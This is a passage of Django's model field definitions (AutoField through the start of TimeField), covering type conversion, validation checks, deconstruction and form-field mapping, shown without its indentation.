choices = list(self.choices) if self.choices else []
named_groups = choices and isinstance(choices[0][1], (list, tuple))
if not named_groups:
for choice, __ in choices:
if choice in ('', None):
blank_defined = True
break
first_choice = (blank_choice if include_blank and
not blank_defined else [])
if self.choices:
return first_choice + choices
rel_model = self.remote_field.model
limit_choices_to = limit_choices_to or self.get_limit_choices_to()
if hasattr(self.remote_field, 'get_related_field'):
lst = [(getattr(x, self.remote_field.get_related_field().attname),
smart_text(x))
for x in rel_model._default_manager.complex_filter(
limit_choices_to)]
else:
lst = [(x._get_pk_val(), smart_text(x))
for x in rel_model._default_manager.complex_filter(
limit_choices_to)]
return first_choice + lst
@warn_about_renamed_method(
'Field', '_get_val_from_obj', 'value_from_object',
RemovedInDjango20Warning
)
def _get_val_from_obj(self, obj):
if obj is not None:
return getattr(obj, self.attname)
else:
return self.get_default()
def value_to_string(self, obj):
"""
Returns a string value of this field from the passed obj.
This is used by the serialization framework.
"""
return force_text(self.value_from_object(obj))
def _get_flatchoices(self):
"""Flattened version of choices tuple."""
flat = []
for choice, value in self.choices:
if isinstance(value, (list, tuple)):
flat.extend(value)
else:
flat.append((choice, value))
return flat
flatchoices = property(_get_flatchoices)
def save_form_data(self, instance, data):
setattr(instance, self.name, data)
def formfield(self, form_class=None, choices_form_class=None, **kwargs):
"""
Returns a django.forms.Field instance for this database Field.
"""
defaults = {'required': not self.blank,
'label': capfirst(self.verbose_name),
'help_text': self.help_text}
if self.has_default():
if callable(self.default):
defaults['initial'] = self.default
defaults['show_hidden_initial'] = True
else:
defaults['initial'] = self.get_default()
if self.choices:
# Fields with choices get special treatment.
include_blank = (self.blank or
not (self.has_default() or 'initial' in kwargs))
defaults['choices'] = self.get_choices(include_blank=include_blank)
defaults['coerce'] = self.to_python
if self.null:
defaults['empty_value'] = None
if choices_form_class is not None:
form_class = choices_form_class
else:
form_class = forms.TypedChoiceField
# Many of the subclass-specific formfield arguments (min_value,
# max_value) don't apply for choice fields, so be sure to only pass
# the values that TypedChoiceField will understand.
for k in list(kwargs):
if k not in ('coerce', 'empty_value', 'choices', 'required',
'widget', 'label', 'initial', 'help_text',
'error_messages', 'show_hidden_initial', 'disabled'):
del kwargs[k]
defaults.update(kwargs)
if form_class is None:
form_class = forms.CharField
return form_class(**defaults)
def value_from_object(self, obj):
"""
Returns the value of this field in the given model instance.
"""
return getattr(obj, self.attname)
class AutoField(Field):
description = _("Integer")
empty_strings_allowed = False
default_error_messages = {
'invalid': _("'%(value)s' value must be an integer."),
}
def __init__(self, *args, **kwargs):
kwargs['blank'] = True
super(AutoField, self).__init__(*args, **kwargs)
def check(self, **kwargs):
errors = super(AutoField, self).check(**kwargs)
errors.extend(self._check_primary_key())
return errors
def _check_primary_key(self):
if not self.primary_key:
return [
checks.Error(
'AutoFields must set primary_key=True.',
obj=self,
id='fields.E100',
),
]
else:
return []
def deconstruct(self):
name, path, args, kwargs = super(AutoField, self).deconstruct()
del kwargs['blank']
kwargs['primary_key'] = True
return name, path, args, kwargs
def get_internal_type(self):
return "AutoField"
def to_python(self, value):
if value is None:
return value
try:
return int(value)
except (TypeError, ValueError):
raise exceptions.ValidationError(
self.error_messages['invalid'],
code='invalid',
params={'value': value},
)
def rel_db_type(self, connection):
return IntegerField().db_type(connection=connection)
def validate(self, value, model_instance):
pass
def get_db_prep_value(self, value, connection, prepared=False):
if not prepared:
value = self.get_prep_value(value)
value = connection.ops.validate_autopk_value(value)
return value
def get_prep_value(self, value):
value = super(AutoField, self).get_prep_value(value)
if value is None:
return None
return int(value)
def contribute_to_class(self, cls, name, **kwargs):
assert not cls._meta.auto_field, "A model can't have more than one AutoField."
super(AutoField, self).contribute_to_class(cls, name, **kwargs)
cls._meta.auto_field = self
def formfield(self, **kwargs):
return None
class BigAutoField(AutoField):
description = _("Big (8 byte) integer")
def get_internal_type(self):
return "BigAutoField"
def rel_db_type(self, connection):
return BigIntegerField().db_type(connection=connection)
class BooleanField(Field):
empty_strings_allowed = False
default_error_messages = {
'invalid': _("'%(value)s' value must be either True or False."),
}
description = _("Boolean (Either True or False)")
def __init__(self, *args, **kwargs):
kwargs['blank'] = True
super(BooleanField, self).__init__(*args, **kwargs)
def check(self, **kwargs):
errors = super(BooleanField, self).check(**kwargs)
errors.extend(self._check_null(**kwargs))
return errors
def _check_null(self, **kwargs):
if getattr(self, 'null', False):
return [
checks.Error(
'BooleanFields do not accept null values.',
hint='Use a NullBooleanField instead.',
obj=self,
id='fields.E110',
)
]
else:
return []
def deconstruct(self):
name, path, args, kwargs = super(BooleanField, self).deconstruct()
del kwargs['blank']
return name, path, args, kwargs
def get_internal_type(self):
return "BooleanField"
def to_python(self, value):
if value in (True, False):
# if value is 1 or 0 than it's equal to True or False, but we want
# to return a true bool for semantic reasons.
return bool(value)
if value in ('t', 'True', '1'):
return True
if value in ('f', 'False', '0'):
return False
raise exceptions.ValidationError(
self.error_messages['invalid'],
code='invalid',
params={'value': value},
)
def get_prep_value(self, value):
value = super(BooleanField, self).get_prep_value(value)
if value is None:
return None
return self.to_python(value)
def formfield(self, **kwargs):
# Unlike most fields, BooleanField figures out include_blank from
# self.null instead of self.blank.
if self.choices:
include_blank = not (self.has_default() or 'initial' in kwargs)
defaults = {'choices': self.get_choices(include_blank=include_blank)}
else:
defaults = {'form_class': forms.BooleanField}
defaults.update(kwargs)
return super(BooleanField, self).formfield(**defaults)
class CharField(Field):
description = _("String (up to %(max_length)s)")
def __init__(self, *args, **kwargs):
super(CharField, self).__init__(*args, **kwargs)
self.validators.append(validators.MaxLengthValidator(self.max_length))
def check(self, **kwargs):
errors = super(CharField, self).check(**kwargs)
errors.extend(self._check_max_length_attribute(**kwargs))
return errors
def _check_max_length_attribute(self, **kwargs):
if self.max_length is None:
return [
checks.Error(
"CharFields must define a 'max_length' attribute.",
obj=self,
id='fields.E120',
)
]
elif not isinstance(self.max_length, six.integer_types) or self.max_length <= 0:
return [
checks.Error(
"'max_length' must be a positive integer.",
obj=self,
id='fields.E121',
)
]
else:
return []
def get_internal_type(self):
return "CharField"
def to_python(self, value):
if isinstance(value, six.string_types) or value is None:
return value
return force_text(value)
def get_prep_value(self, value):
value = super(CharField, self).get_prep_value(value)
return self.to_python(value)
def formfield(self, **kwargs):
# Passing max_length to forms.CharField means that the value's length
# will be validated twice. This is considered acceptable since we want
# the value in the form field (to pass into widget for example).
defaults = {'max_length': self.max_length}
# TODO: Handle multiple backends with different feature flags.
if self.null and not connection.features.interprets_empty_strings_as_nulls:
defaults['empty_value'] = None
defaults.update(kwargs)
return super(CharField, self).formfield(**defaults)
class CommaSeparatedIntegerField(CharField):
default_validators = [validators.validate_comma_separated_integer_list]
description = _("Comma-separated integers")
system_check_deprecated_details = {
'msg': (
'CommaSeparatedIntegerField has been deprecated. Support '
'for it (except in historical migrations) will be removed '
'in Django 2.0.'
),
'hint': (
'Use CharField(validators=[validate_comma_separated_integer_list]) instead.'
),
'id': 'fields.W901',
}
def formfield(self, **kwargs):
defaults = {
'error_messages': {
'invalid': _('Enter only digits separated by commas.'),
}
}
defaults.update(kwargs)
return super(CommaSeparatedIntegerField, self).formfield(**defaults)
class DateTimeCheckMixin(object):
def check(self, **kwargs):
errors = super(DateTimeCheckMixin, self).check(**kwargs)
errors.extend(self._check_mutually_exclusive_options())
errors.extend(self._check_fix_default_value())
return errors
def _check_mutually_exclusive_options(self):
# auto_now, auto_now_add, and default are mutually exclusive
# options. The use of more than one of these options together
# will trigger an Error
mutually_exclusive_options = [self.auto_now_add, self.auto_now, self.has_default()]
enabled_options = [option not in (None, False) for option in mutually_exclusive_options].count(True)
if enabled_options > 1:
return [
checks.Error(
"The options auto_now, auto_now_add, and default "
"are mutually exclusive. Only one of these options "
"may be present.",
obj=self,
id='fields.E160',
)
]
else:
return []
def _check_fix_default_value(self):
return []
class DateField(DateTimeCheckMixin, Field):
empty_strings_allowed = False
default_error_messages = {
'invalid': _("'%(value)s' value has an invalid date format. It must be "
"in YYYY-MM-DD format."),
'invalid_date': _("'%(value)s' value has the correct format (YYYY-MM-DD) "
"but it is an invalid date."),
}
description = _("Date (without time)")
def __init__(self, verbose_name=None, name=None, auto_now=False,
auto_now_add=False, **kwargs):
self.auto_now, self.auto_now_add = auto_now, auto_now_add
if auto_now or auto_now_add:
kwargs['editable'] = False
kwargs['blank'] = True
super(DateField, self).__init__(verbose_name, name, **kwargs)
def _check_fix_default_value(self):
"""
Adds a warning to the checks framework stating, that using an actual
date or datetime value is probably wrong; it's only being evaluated on
server start-up.
For details see ticket #21905
"""
if not self.has_default():
return []
now = timezone.now()
if not timezone.is_naive(now):
now = timezone.make_naive(now, timezone.utc)
value = self.default
if isinstance(value, datetime.datetime):
if not timezone.is_naive(value):
value = timezone.make_naive(value, timezone.utc)
value = value.date()
elif isinstance(value, datetime.date):
# Nothing to do, as dates don't have tz information
pass
else:
# No explicit date / datetime value -- no checks necessary
return []
offset = datetime.timedelta(days=1)
lower = (now - offset).date()
upper = (now + offset).date()
if lower <= value <= upper:
return [
checks.Warning(
'Fixed default value provided.',
hint='It seems you set a fixed date / time / datetime '
'value as default for this field. This may not be '
'what you want. If you want to have the current date '
'as default, use `django.utils.timezone.now`',
obj=self,
id='fields.W161',
)
]
return []
def deconstruct(self):
name, path, args, kwargs = super(DateField, self).deconstruct()
if self.auto_now:
kwargs['auto_now'] = True
if self.auto_now_add:
kwargs['auto_now_add'] = True
if self.auto_now or self.auto_now_add:
del kwargs['editable']
del kwargs['blank']
return name, path, args, kwargs
def get_internal_type(self):
return "DateField"
def to_python(self, value):
if value is None:
return value
if isinstance(value, datetime.datetime):
if settings.USE_TZ and timezone.is_aware(value):
# Convert aware datetimes to the default time zone
# before casting them to dates (#17742).
default_timezone = timezone.get_default_timezone()
value = timezone.make_naive(value, default_timezone)
return value.date()
if isinstance(value, datetime.date):
return value
try:
parsed = parse_date(value)
if parsed is not None:
return parsed
except ValueError:
raise exceptions.ValidationError(
self.error_messages['invalid_date'],
code='invalid_date',
params={'value': value},
)
raise exceptions.ValidationError(
self.error_messages['invalid'],
code='invalid',
params={'value': value},
)
def pre_save(self, model_instance, add):
if self.auto_now or (self.auto_now_add and add):
value = datetime.date.today()
setattr(model_instance, self.attname, value)
return value
else:
return super(DateField, self).pre_save(model_instance, add)
def contribute_to_class(self, cls, name, **kwargs):
super(DateField, self).contribute_to_class(cls, name, **kwargs)
if not self.null:
setattr(
cls, 'get_next_by_%s' % self.name,
curry(cls._get_next_or_previous_by_FIELD, field=self, is_next=True)
)
setattr(
cls, 'get_previous_by_%s' % self.name,
curry(cls._get_next_or_previous_by_FIELD, field=self, is_next=False)
)
def get_prep_value(self, value):
value = super(DateField, self).get_prep_value(value)
return self.to_python(value)
def get_db_prep_value(self, value, connection, prepared=False):
# Casts dates into the format expected by the backend
if not prepared:
value = self.get_prep_value(value)
return connection.ops.adapt_datefield_value(value)
def value_to_string(self, obj):
val = self.value_from_object(obj)
return '' if val is None else val.isoformat()
def formfield(self, **kwargs):
defaults = {'form_class': forms.DateField}
defaults.update(kwargs)
return super(DateField, self).formfield(**defaults)
class DateTimeField(DateField):
empty_strings_allowed = False
default_error_messages = {
'invalid': _("'%(value)s' value has an invalid format. It must be in "
"YYYY-MM-DD HH:MM[:ss[.uuuuuu]][TZ] format."),
'invalid_date': _("'%(value)s' value has the correct format "
"(YYYY-MM-DD) but it is an invalid date."),
'invalid_datetime': _("'%(value)s' value has the correct format "
"(YYYY-MM-DD HH:MM[:ss[.uuuuuu]][TZ]) "
"but it is an invalid date/time."),
}
description = _("Date (with time)")
# __init__ is inherited from DateField
def _check_fix_default_value(self):
"""
Adds a warning to the checks framework stating, that using an actual
date or datetime value is probably wrong; it's only being evaluated on
server start-up.
For details see ticket #21905
"""
if not self.has_default():
return []
now = timezone.now()
if not timezone.is_naive(now):
now = timezone.make_naive(now, timezone.utc)
value = self.default
if isinstance(value, datetime.datetime):
second_offset = datetime.timedelta(seconds=10)
lower = now - second_offset
upper = now + second_offset
if timezone.is_aware(value):
value = timezone.make_naive(value, timezone.utc)
elif isinstance(value, datetime.date):
second_offset = datetime.timedelta(seconds=10)
lower = now - second_offset
lower = datetime.datetime(lower.year, lower.month, lower.day)
upper = now + second_offset
upper = datetime.datetime(upper.year, upper.month, upper.day)
value = datetime.datetime(value.year, value.month, value.day)
else:
# No explicit date / datetime value -- no checks necessary
return []
if lower <= value <= upper:
return [
checks.Warning(
'Fixed default value provided.',
hint='It seems you set a fixed date / time / datetime '
'value as default for this field. This may not be '
'what you want. If you want to have the current date '
'as default, use `django.utils.timezone.now`',
obj=self,
id='fields.W161',
)
]
return []
def get_internal_type(self):
return "DateTimeField"
def to_python(self, value):
if value is None:
return value
if isinstance(value, datetime.datetime):
return value
if isinstance(value, datetime.date):
value = datetime.datetime(value.year, value.month, value.day)
if settings.USE_TZ:
# For backwards compatibility, interpret naive datetimes in
# local time. This won't work during DST change, but we can't
# do much about it, so we let the exceptions percolate up the
# call stack.
warnings.warn("DateTimeField %s.%s received a naive datetime "
"(%s) while time zone support is active." %
(self.model.__name__, self.name, value),
RuntimeWarning)
default_timezone = timezone.get_default_timezone()
value = timezone.make_aware(value, default_timezone)
return value
try:
parsed = parse_datetime(value)
if parsed is not None:
return parsed
except ValueError:
raise exceptions.ValidationError(
self.error_messages['invalid_datetime'],
code='invalid_datetime',
params={'value': value},
)
try:
parsed = parse_date(value)
if parsed is not None:
return datetime.datetime(parsed.year, parsed.month, parsed.day)
except ValueError:
raise exceptions.ValidationError(
self.error_messages['invalid_date'],
code='invalid_date',
params={'value': value},
)
raise exceptions.ValidationError(
self.error_messages['invalid'],
code='invalid',
params={'value': value},
)
def pre_save(self, model_instance, add):
if self.auto_now or (self.auto_now_add and add):
value = timezone.now()
setattr(model_instance, self.attname, value)
return value
else:
return super(DateTimeField, self).pre_save(model_instance, add)
# contribute_to_class is inherited from DateField, it registers
# get_next_by_FOO and get_prev_by_FOO
def get_prep_value(self, value):
value = super(DateTimeField, self).get_prep_value(value)
value = self.to_python(value)
if value is not None and settings.USE_TZ and timezone.is_naive(value):
# For backwards compatibility, interpret naive datetimes in local
# time. This won't work during DST change, but we can't do much
# about it, so we let the exceptions percolate up the call stack.
try:
name = '%s.%s' % (self.model.__name__, self.name)
except AttributeError:
name = '(unbound)'
warnings.warn("DateTimeField %s received a naive datetime (%s)"
" while time zone support is active." %
(name, value),
RuntimeWarning)
default_timezone = timezone.get_default_timezone()
value = timezone.make_aware(value, default_timezone)
return value
def get_db_prep_value(self, value, connection, prepared=False):
# Casts datetimes into the format expected by the backend
if not prepared:
value = self.get_prep_value(value)
return connection.ops.adapt_datetimefield_value(value)
def value_to_string(self, obj):
val = self.value_from_object(obj)
return '' if val is None else val.isoformat()
def formfield(self, **kwargs):
defaults = {'form_class': forms.DateTimeField}
defaults.update(kwargs)
return super(DateTimeField, self).formfield(**defaults)
class DecimalField(Field):
empty_strings_allowed = False
default_error_messages = {
'invalid': _("'%(value)s' value must be a decimal number."),
}
description = _("Decimal number")
def __init__(self, verbose_name=None, name=None, max_digits=None,
decimal_places=None, **kwargs):
self.max_digits, self.decimal_places = max_digits, decimal_places
super(DecimalField, self).__init__(verbose_name, name, **kwargs)
def check(self, **kwargs):
errors = super(DecimalField, self).check(**kwargs)
digits_errors = self._check_decimal_places()
digits_errors.extend(self._check_max_digits())
if not digits_errors:
errors.extend(self._check_decimal_places_and_max_digits(**kwargs))
else:
errors.extend(digits_errors)
return errors
def _check_decimal_places(self):
try:
decimal_places = int(self.decimal_places)
if decimal_places < 0:
raise ValueError()
except TypeError:
return [
checks.Error(
"DecimalFields must define a 'decimal_places' attribute.",
obj=self,
id='fields.E130',
)
]
except ValueError:
return [
checks.Error(
"'decimal_places' must be a non-negative integer.",
obj=self,
id='fields.E131',
)
]
else:
return []
def _check_max_digits(self):
try:
max_digits = int(self.max_digits)
if max_digits <= 0:
raise ValueError()
except TypeError:
return [
checks.Error(
"DecimalFields must define a 'max_digits' attribute.",
obj=self,
id='fields.E132',
)
]
except ValueError:
return [
checks.Error(
"'max_digits' must be a positive integer.",
obj=self,
id='fields.E133',
)
]
else:
return []
def _check_decimal_places_and_max_digits(self, **kwargs):
if int(self.decimal_places) > int(self.max_digits):
return [
checks.Error(
"'max_digits' must be greater or equal to 'decimal_places'.",
obj=self,
id='fields.E134',
)
]
return []
@cached_property
def validators(self):
return super(DecimalField, self).validators + [
validators.DecimalValidator(self.max_digits, self.decimal_places)
]
def deconstruct(self):
name, path, args, kwargs = super(DecimalField, self).deconstruct()
if self.max_digits is not None:
kwargs['max_digits'] = self.max_digits
if self.decimal_places is not None:
kwargs['decimal_places'] = self.decimal_places
return name, path, args, kwargs
def get_internal_type(self):
return "DecimalField"
def to_python(self, value):
if value is None:
return value
try:
return decimal.Decimal(value)
except decimal.InvalidOperation:
raise exceptions.ValidationError(
self.error_messages['invalid'],
code='invalid',
params={'value': value},
)
def _format(self, value):
if isinstance(value, six.string_types):
return value
else:
return self.format_number(value)
def format_number(self, value):
"""
Formats a number into a string with the requisite number of digits and
decimal places.
"""
# Method moved to django.db.backends.utils.
#
# It is preserved because it is used by the oracle backend
# (django.db.backends.oracle.query), and also for
# backwards-compatibility with any external code which may have used
# this method.
from django.db.backends import utils
return utils.format_number(value, self.max_digits, self.decimal_places)
def get_db_prep_save(self, value, connection):
return connection.ops.adapt_decimalfield_value(self.to_python(value), self.max_digits, self.decimal_places)
def get_prep_value(self, value):
value = super(DecimalField, self).get_prep_value(value)
return self.to_python(value)
def formfield(self, **kwargs):
defaults = {
'max_digits': self.max_digits,
'decimal_places': self.decimal_places,
'form_class': forms.DecimalField,
}
defaults.update(kwargs)
return super(DecimalField, self).formfield(**defaults)
class DurationField(Field):
"""Stores timedelta objects.
Uses interval on PostgreSQL, INTERVAL DAY TO SECOND on Oracle, and bigint
of microseconds on other databases.
"""
empty_strings_allowed = False
default_error_messages = {
'invalid': _("'%(value)s' value has an invalid format. It must be in "
"[DD] [HH:[MM:]]ss[.uuuuuu] format.")
}
description = _("Duration")
def get_internal_type(self):
return "DurationField"
def to_python(self, value):
if value is None:
return value
if isinstance(value, datetime.timedelta):
return value
try:
parsed = parse_duration(value)
except ValueError:
pass
else:
if parsed is not None:
return parsed
raise exceptions.ValidationError(
self.error_messages['invalid'],
code='invalid',
params={'value': value},
)
def get_db_prep_value(self, value, connection, prepared=False):
if connection.features.has_native_duration_field:
return value
if value is None:
return None
# Discard any fractional microseconds due to floating point arithmetic.
return int(round(value.total_seconds() * 1000000))
def get_db_converters(self, connection):
converters = []
if not connection.features.has_native_duration_field:
converters.append(connection.ops.convert_durationfield_value)
return converters + super(DurationField, self).get_db_converters(connection)
def value_to_string(self, obj):
val = self.value_from_object(obj)
return '' if val is None else duration_string(val)
def formfield(self, **kwargs):
defaults = {
'form_class': forms.DurationField,
}
defaults.update(kwargs)
return super(DurationField, self).formfield(**defaults)
class EmailField(CharField):
default_validators = [validators.validate_email]
description = _("Email address")
def __init__(self, *args, **kwargs):
# max_length=254 to be compliant with RFCs 3696 and 5321
kwargs['max_length'] = kwargs.get('max_length', 254)
super(EmailField, self).__init__(*args, **kwargs)
def deconstruct(self):
name, path, args, kwargs = super(EmailField, self).deconstruct()
# We do not exclude max_length if it matches default as we want to change
# the default in future.
return name, path, args, kwargs
def formfield(self, **kwargs):
# As with CharField, this will cause email validation to be performed
# twice.
defaults = {
'form_class': forms.EmailField,
}
defaults.update(kwargs)
return super(EmailField, self).formfield(**defaults)
class FilePathField(Field):
description = _("File path")
def __init__(self, verbose_name=None, name=None, path='', match=None,
recursive=False, allow_files=True, allow_folders=False, **kwargs):
self.path, self.match, self.recursive = path, match, recursive
self.allow_files, self.allow_folders = allow_files, allow_folders
kwargs['max_length'] = kwargs.get('max_length', 100)
super(FilePathField, self).__init__(verbose_name, name, **kwargs)
def check(self, **kwargs):
errors = super(FilePathField, self).check(**kwargs)
errors.extend(self._check_allowing_files_or_folders(**kwargs))
return errors
def _check_allowing_files_or_folders(self, **kwargs):
if not self.allow_files and not self.allow_folders:
return [
checks.Error(
"FilePathFields must have either 'allow_files' or 'allow_folders' set to True.",
obj=self,
id='fields.E140',
)
]
return []
def deconstruct(self):
name, path, args, kwargs = super(FilePathField, self).deconstruct()
if self.path != '':
kwargs['path'] = self.path
if self.match is not None:
kwargs['match'] = self.match
if self.recursive is not False:
kwargs['recursive'] = self.recursive
if self.allow_files is not True:
kwargs['allow_files'] = self.allow_files
if self.allow_folders is not False:
kwargs['allow_folders'] = self.allow_folders
if kwargs.get("max_length") == 100:
del kwargs["max_length"]
return name, path, args, kwargs
def get_prep_value(self, value):
value = super(FilePathField, self).get_prep_value(value)
if value is None:
return None
return six.text_type(value)
def formfield(self, **kwargs):
defaults = {
'path': self.path,
'match': self.match,
'recursive': self.recursive,
'form_class': forms.FilePathField,
'allow_files': self.allow_files,
'allow_folders': self.allow_folders,
}
defaults.update(kwargs)
return super(FilePathField, self).formfield(**defaults)
def get_internal_type(self):
return "FilePathField"
class FloatField(Field):
empty_strings_allowed = False
default_error_messages = {
'invalid': _("'%(value)s' value must be a float."),
}
description = _("Floating point number")
def get_prep_value(self, value):
value = super(FloatField, self).get_prep_value(value)
if value is None:
return None
return float(value)
def get_internal_type(self):
return "FloatField"
def to_python(self, value):
if value is None:
return value
try:
return float(value)
except (TypeError, ValueError):
raise exceptions.ValidationError(
self.error_messages['invalid'],
code='invalid',
params={'value': value},
)
def formfield(self, **kwargs):
defaults = {'form_class': forms.FloatField}
defaults.update(kwargs)
return super(FloatField, self).formfield(**defaults)
class IntegerField(Field):
empty_strings_allowed = False
default_error_messages = {
'invalid': _("'%(value)s' value must be an integer."),
}
description = _("Integer")
def check(self, **kwargs):
errors = super(IntegerField, self).check(**kwargs)
errors.extend(self._check_max_length_warning())
return errors
def _check_max_length_warning(self):
if self.max_length is not None:
return [
checks.Warning(
"'max_length' is ignored when used with IntegerField",
hint="Remove 'max_length' from field",
obj=self,
id='fields.W122',
)
]
return []
@cached_property
def validators(self):
# These validators can't be added at field initialization time since
# they're based on values retrieved from `connection`.
validators_ = super(IntegerField, self).validators
internal_type = self.get_internal_type()
min_value, max_value = connection.ops.integer_field_range(internal_type)
if min_value is not None:
for validator in validators_:
if isinstance(validator, validators.MinValueValidator) and validator.limit_value >= min_value:
break
else:
validators_.append(validators.MinValueValidator(min_value))
if max_value is not None:
for validator in validators_:
if isinstance(validator, validators.MaxValueValidator) and validator.limit_value <= max_value:
break
else:
validators_.append(validators.MaxValueValidator(max_value))
return validators_
def get_prep_value(self, value):
value = super(IntegerField, self).get_prep_value(value)
if value is None:
return None
return int(value)
def get_internal_type(self):
return "IntegerField"
def to_python(self, value):
if value is None:
return value
try:
return int(value)
except (TypeError, ValueError):
raise exceptions.ValidationError(
self.error_messages['invalid'],
code='invalid',
params={'value': value},
)
def formfield(self, **kwargs):
defaults = {'form_class': forms.IntegerField}
defaults.update(kwargs)
return super(IntegerField, self).formfield(**defaults)
class BigIntegerField(IntegerField):
empty_strings_allowed = False
description = _("Big (8 byte) integer")
MAX_BIGINT = 9223372036854775807
def get_internal_type(self):
return "BigIntegerField"
def formfield(self, **kwargs):
defaults = {'min_value': -BigIntegerField.MAX_BIGINT - 1,
'max_value': BigIntegerField.MAX_BIGINT}
defaults.update(kwargs)
return super(BigIntegerField, self).formfield(**defaults)
class IPAddressField(Field):
empty_strings_allowed = False
description = _("IPv4 address")
system_check_removed_details = {
'msg': (
'IPAddressField has been removed except for support in '
'historical migrations.'
),
'hint': 'Use GenericIPAddressField instead.',
'id': 'fields.E900',
}
def __init__(self, *args, **kwargs):
kwargs['max_length'] = 15
super(IPAddressField, self).__init__(*args, **kwargs)
def deconstruct(self):
name, path, args, kwargs = super(IPAddressField, self).deconstruct()
del kwargs['max_length']
return name, path, args, kwargs
def get_prep_value(self, value):
value = super(IPAddressField, self).get_prep_value(value)
if value is None:
return None
return six.text_type(value)
def get_internal_type(self):
return "IPAddressField"
class GenericIPAddressField(Field):
empty_strings_allowed = False
description = _("IP address")
default_error_messages = {}
def __init__(self, verbose_name=None, name=None, protocol='both',
unpack_ipv4=False, *args, **kwargs):
self.unpack_ipv4 = unpack_ipv4
self.protocol = protocol
self.default_validators, invalid_error_message = \
validators.ip_address_validators(protocol, unpack_ipv4)
self.default_error_messages['invalid'] = invalid_error_message
kwargs['max_length'] = 39
super(GenericIPAddressField, self).__init__(verbose_name, name, *args,
**kwargs)
def check(self, **kwargs):
errors = super(GenericIPAddressField, self).check(**kwargs)
errors.extend(self._check_blank_and_null_values(**kwargs))
return errors
def _check_blank_and_null_values(self, **kwargs):
if not getattr(self, 'null', False) and getattr(self, 'blank', False):
return [
checks.Error(
'GenericIPAddressFields cannot have blank=True if null=False, '
'as blank values are stored as nulls.',
obj=self,
id='fields.E150',
)
]
return []
def deconstruct(self):
name, path, args, kwargs = super(GenericIPAddressField, self).deconstruct()
if self.unpack_ipv4 is not False:
kwargs['unpack_ipv4'] = self.unpack_ipv4
if self.protocol != "both":
kwargs['protocol'] = self.protocol
if kwargs.get("max_length") == 39:
del kwargs['max_length']
return name, path, args, kwargs
def get_internal_type(self):
return "GenericIPAddressField"
def to_python(self, value):
if value is None:
return None
if not isinstance(value, six.string_types):
value = force_text(value)
value = value.strip()
if ':' in value:
return clean_ipv6_address(value, self.unpack_ipv4, self.error_messages['invalid'])
return value
def get_db_prep_value(self, value, connection, prepared=False):
if not prepared:
value = self.get_prep_value(value)
return connection.ops.adapt_ipaddressfield_value(value)
def get_prep_value(self, value):
value = super(GenericIPAddressField, self).get_prep_value(value)
if value is None:
return None
if value and ':' in value:
try:
return clean_ipv6_address(value, self.unpack_ipv4)
except exceptions.ValidationError:
pass
return six.text_type(value)
def formfield(self, **kwargs):
defaults = {
'protocol': self.protocol,
'form_class': forms.GenericIPAddressField,
}
defaults.update(kwargs)
return super(GenericIPAddressField, self).formfield(**defaults)
class NullBooleanField(Field):
empty_strings_allowed = False
default_error_messages = {
'invalid': _("'%(value)s' value must be either None, True or False."),
}
description = _("Boolean (Either True, False or None)")
def __init__(self, *args, **kwargs):
kwargs['null'] = True
kwargs['blank'] = True
super(NullBooleanField, self).__init__(*args, **kwargs)
def deconstruct(self):
name, path, args, kwargs = super(NullBooleanField, self).deconstruct()
del kwargs['null']
del kwargs['blank']
return name, path, args, kwargs
def get_internal_type(self):
return "NullBooleanField"
def to_python(self, value):
if value is None:
return None
if value in (True, False):
return bool(value)
if value in ('None',):
return None
if value in ('t', 'True', '1'):
return True
if value in ('f', 'False', '0'):
return False
raise exceptions.ValidationError(
self.error_messages['invalid'],
code='invalid',
params={'value': value},
)
def get_prep_value(self, value):
value = super(NullBooleanField, self).get_prep_value(value)
if value is None:
return None
return self.to_python(value)
def formfield(self, **kwargs):
defaults = {'form_class': forms.NullBooleanField}
defaults.update(kwargs)
return super(NullBooleanField, self).formfield(**defaults)
class PositiveIntegerRelDbTypeMixin(object):
def rel_db_type(self, connection):
"""
Return the data type that a related field pointing to this field should
use. In most cases, a foreign key pointing to a positive integer
primary key will have an integer column data type but some databases
(e.g. MySQL) have an unsigned integer type. In that case
(related_fields_match_type=True), the primary key should return its
db_type.
"""
if connection.features.related_fields_match_type:
return self.db_type(connection)
else:
return IntegerField().db_type(connection=connection)
class PositiveIntegerField(PositiveIntegerRelDbTypeMixin, IntegerField):
description = _("Positive integer")
def get_internal_type(self):
return "PositiveIntegerField"
def formfield(self, **kwargs):
defaults = {'min_value': 0}
defaults.update(kwargs)
return super(PositiveIntegerField, self).formfield(**defaults)
class PositiveSmallIntegerField(PositiveIntegerRelDbTypeMixin, IntegerField):
description = _("Positive small integer")
def get_internal_type(self):
return "PositiveSmallIntegerField"
def formfield(self, **kwargs):
defaults = {'min_value': 0}
defaults.update(kwargs)
return super(PositiveSmallIntegerField, self).formfield(**defaults)
class SlugField(CharField):
default_validators = [validators.validate_slug]
description = _("Slug (up to %(max_length)s)")
def __init__(self, *args, **kwargs):
kwargs['max_length'] = kwargs.get('max_length', 50)
# Set db_index=True unless it's been set manually.
if 'db_index' not in kwargs:
kwargs['db_index'] = True
self.allow_unicode = kwargs.pop('allow_unicode', False)
if self.allow_unicode:
self.default_validators = [validators.validate_unicode_slug]
super(SlugField, self).__init__(*args, **kwargs)
def deconstruct(self):
name, path, args, kwargs = super(SlugField, self).deconstruct()
if kwargs.get("max_length") == 50:
del kwargs['max_length']
if self.db_index is False:
kwargs['db_index'] = False
else:
del kwargs['db_index']
if self.allow_unicode is not False:
kwargs['allow_unicode'] = self.allow_unicode
return name, path, args, kwargs
def get_internal_type(self):
return "SlugField"
def formfield(self, **kwargs):
defaults = {'form_class': forms.SlugField, 'allow_unicode': self.allow_unicode}
defaults.update(kwargs)
return super(SlugField, self).formfield(**defaults)
class SmallIntegerField(IntegerField):
description = _("Small integer")
def get_internal_type(self):
return "SmallIntegerField"
class TextField(Field):
description = _("Text")
def get_internal_type(self):
return "TextField"
def to_python(self, value):
if isinstance(value, six.string_types) or value is None:
return value
return force_text(value)
def get_prep_value(self, value):
value = super(TextField, self).get_prep_value(value)
return self.to_python(value)
def formfield(self, **kwargs):
# Passing max_length to forms.CharField means that the value's length
# will be validated twice. This is considered acceptable since we want
# the value in the form field (to pass into widget for example).
defaults = {'max_length': self.max_length, 'widget': forms.Textarea}
defaults.update(kwargs)
return super(TextField, self).formfield(**defaults)
class TimeField(DateTimeCheckMixin, Field):
empty_strings_allowed = False
default_error_messages = {
'invalid': _("'%(value)s' value has an invalid format. It must be in "
"HH:MM[:ss[.uuuuuu]] format."),
'invalid_time': _("'%(value)s' value has the correct format "
"(HH:MM[:ss[.uuuuuu]]) but it is an invalid time."),
}
description = _("Time")
